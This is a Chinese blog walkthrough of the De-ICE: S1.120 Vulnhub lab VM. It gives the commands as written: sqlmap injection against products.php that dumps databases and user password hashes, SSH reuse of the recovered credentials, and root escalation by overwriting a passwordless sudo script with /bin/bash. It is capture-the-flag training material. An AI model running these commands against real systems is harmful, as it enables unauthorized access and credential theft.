De-ICE:S1.120靶机

最新推荐文章于 2024-07-30 22:47:36 发布
最新推荐文章于 2024-07-30 22:47:36 发布
阅读量274 收藏 6
点赞数 3
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hqy250019/article/details/140806558
版权

查看MAC地址

将kali和靶机都设为仅主机模式

改为1网段

扫描IP

查看开启端口,可以看到端口 80、443、3306、21、22 已打开

访问192.168.1.120

点击Add Product

提交后,将显示以下页面。

有id值,看看有没有SQL注入

使用工具

python3 sqlmap.py -u "http://192.168.1.120/products.php?id=1" --batch

存在SQL注入

python3 sqlmap.py -u http://192.168.1.120/products.php?id=1 --dbs --batch

python3 sqlmap.py -u http://192.168.1.120/products.php?id=1 -D mysql --users --passwords --batch

通过SSH测试它们,所有用户都可以登录系统

使用用户名作为 ccoffee 进行了 SSH

枚举具有 SUID 权限的所有二进制文件。

find / -perm -u=s -type f 2>/dev/null

从截图中可以看出,在列出的所有用户中,用户 ccoffee 为位于路径 /home/ccoffee/scripts/getlogs.sh 命令启用了 SUID 位,这意味着我们可以执行 getlogs.sh 命令内的任何命令

此时,我们还检查一下 sudo 文件的内容

在执行 sudo –l 时,我们观察到在执行命令 /home/ccoffee/scripts/getlogs.sh 时没有为此用户设置密码

切换到/home/ccoffee/scripts/目录下

cd /home/ccoffee/scripts/

getlogs.sh 移动到 getlogs.sh.bak,然后使用以下代码创建一个新的 getlogs.sh 文件以生成 shell

使用命令
mv getlogs.sh getlogs.sh.bak
echo "/bin/bash" >  getlogs.sh
chmod 777 getlogs.sh

使用 sudo执行getlogs.sh文件

sudo /home/ccoffee/scripts/getlogs.sh

执行whoamiid命令发现提权成功

陽陽yy
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机系列:De-ICE: S1.120
汗的博客
03-30 1447
https://www.hackingarticles.in/hack-the-de-ice-s1-120-vm-boot-to-root/ 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外i...
3.DE-ICE: S1.140靶机
Sam5ara的博客
01-16 447
vulnhub
De-ICE_S1.120靶机
m0_61995767的博客
07-29 304
De-ICE_S1.120打靶记录
De-ICE_S1.120靶机复现
weixin_52956666的博客
07-30 243
将getlogs.sh更改为其他名字,将/bin/bash改为getlogs.sh。到/home/ccoffee/scripts路径下。将kali和靶机都设置为仅主机模式。因为ssh服务开启,尝试远程连接。发现存在免密getlogs.sh。点击Add product。输入发现存在反射型xss注入。查看mysql数据库的表。使用sqlmap查询。
vulnhub系列:De-ICE_S1.120靶机
jq_j37的博客
07-30 292
靶机IP为静态IP:192.168.1.120,因此kali设置为仅主机,配置为相同网段。
De-ICE_S1.120靶机渗透测试
weixin_58786230的博客
07-29 325
【代码】De-ICE_S1.120靶机渗透测试。
De-ICE_S1.120靶机 带提权
weixin_71232352的博客
07-30 358
1.查看mac地址并将kali添加一个仅主机模式并使用dhcp分配一个192.168.1.0网段网卡,将靶机设置成仅主机模式。2.使用sudo提权发现不可以使用suid提权。8.发现url有id=1 尝试sql注入漏洞。9.通过sqlmap跑出来用户名跟密码。执行生成的文件并输入id发现提权成功。1.发现是Linux系统。4.首先访问80端口。
Vuluhub靶机 De-ICE: S1.120(渗透测试详细)
2301_78721909的博客
07-30 195
Vuluhub靶机 De-ICE: S1.120 (from wuhu)
DE-ICE: S1.120打靶【附POC】(权限提升)
weixin_52487093的博客
07-30 432
1.安装虚拟主机,主机发现不了已解决;2.kali利用ssh连接不了,已找到替补方案;3.SUID提权
Kioptrix2-WalkThrough 靶机复现.docx
10-18
1. 信息收集:使用 nmap 工具对靶机进行 IP 探活和端口扫描。 2. SQL 注入:使用万能密码尝试登录到靶机上。 3. 命令执行:使用;pwd 命令来确定当前目录,并执行系统命令。 4. 反弹 shell:使用 nc 命令将 shell ...
电信设备-水平移动训练靶机.zip
09-19
电信设备-水平移动训练靶机.zip
一起打靶-Breach-2-final2.1.xss上线
09-28
知识点1:靶机配置 靶机 Breach 2.0 配置了静态 IP(192.168.110.151),用户需要配置主机 only 适配器来访问该子网。 知识点2:生产环境模拟 该挑战试图展示一个真实世界的生产环境场景,带有许多twists 和 trolls...
《计算机网络》(学习笔记
qiqi_liuliu的博客
07-24 2367
网络(Network)由若干结点(Node)和连接这些结点的链路(Link)组成多个网络还可以通过路由器互连起来,这样就构成了一个覆盖范围更大的网络,即互联网(互连网)。因此,互联网是"网络的网络(Network of Networks)"因特网(Internet)是世界上最大的互连网络(用TCP/IP)internet是通用名词,互连的网络都叫internet注:互连、自治、集合。在计算机内部或在相邻设备之间近距离传输时,可不经过调制就在信道上直接进行的传输方式称为基带传输。
Java面试整理,涵盖基础、JVM、线程并发、框架、MySQL、微服务、Redis、中间件、数据结构与算法等。陆续完善中.zip
07-31
Java面试整理,涵盖基础、JVM、线程并发、框架、MySQL、微服务、Redis、中间件、数据结构与算法等。陆续完善中
chromedriver-mac-x64_121.0.6167.184.zip
最新发布
07-31
chromedriver-mac-x64_121.0.6167.184.zip
【Java面试+Java技术文章汇总】 涵盖大部分Java程序员所需要掌握的核心知识。.zip
07-31
【Java面试+Java技术文章汇总】 涵盖大部分Java程序员所需要掌握的核心知识。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值